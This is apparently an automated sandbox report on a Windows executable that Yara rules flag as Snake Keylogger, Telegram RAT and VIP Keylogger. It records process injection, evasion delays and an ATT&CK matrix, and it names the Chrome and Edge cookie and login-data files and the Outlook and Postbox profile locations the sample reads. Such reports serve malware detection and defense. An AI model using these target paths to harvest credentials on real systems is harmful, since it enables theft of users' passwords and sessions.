                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 596983Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 596872Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 596757Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 596643Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 596516Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 596405Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 596297Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 596187Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 596078Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 595969Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 595859Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 595750Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 595641Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 595531Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 595422Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 595313Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 595188Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 595063Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 594938Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 594828Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 594718Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 594609Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeThread delayed: delay time: 594500Jump to behavior
                Source: UFOiZapHGS.exe, 00000001.00000002.3356413048.0000000000EE7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeMemory written: C:\Users\user\Desktop\UFOiZapHGS.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeProcess created: C:\Users\user\Desktop\UFOiZapHGS.exe "C:\Users\user\Desktop\UFOiZapHGS.exe"Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeQueries volume information: C:\Users\user\Desktop\UFOiZapHGS.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeQueries volume information: C:\Users\user\Desktop\UFOiZapHGS.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000001.00000002.3357879942.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 0.2.UFOiZapHGS.exe.4305e48.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.UFOiZapHGS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.UFOiZapHGS.exe.4305e48.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.3355826178.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.910063870.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: UFOiZapHGS.exe PID: 6596, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: UFOiZapHGS.exe PID: 6812, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 0.2.UFOiZapHGS.exe.4305e48.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.UFOiZapHGS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.UFOiZapHGS.exe.4305e48.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.3355826178.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.910063870.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: UFOiZapHGS.exe PID: 6596, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: UFOiZapHGS.exe PID: 6812, type: MEMORYSTR
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Yara matchFile source: 0.2.UFOiZapHGS.exe.4305e48.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.UFOiZapHGS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.UFOiZapHGS.exe.4305e48.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.3355826178.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.910063870.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: UFOiZapHGS.exe PID: 6596, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: UFOiZapHGS.exe PID: 6812, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000001.00000002.3357879942.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 0.2.UFOiZapHGS.exe.4305e48.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.UFOiZapHGS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.UFOiZapHGS.exe.4305e48.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.3355826178.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.910063870.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: UFOiZapHGS.exe PID: 6596, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: UFOiZapHGS.exe PID: 6812, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 0.2.UFOiZapHGS.exe.4305e48.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.UFOiZapHGS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.UFOiZapHGS.exe.4305e48.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.3355826178.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.910063870.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: UFOiZapHGS.exe PID: 6596, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: UFOiZapHGS.exe PID: 6812, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		111
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		1
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Web Service                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading                		1
                Disable or Modify Tools                		LSASS Memory1
                Process Discovery                		Remote Desktop Protocol11
                Archive Collected Data                		11
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
                Virtualization/Sandbox Evasion                		Security Account Manager31
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		3
                Ingress Tool Transfer                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture3
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                System Network Configuration Discovery                		SSHKeylogging14
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials13
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.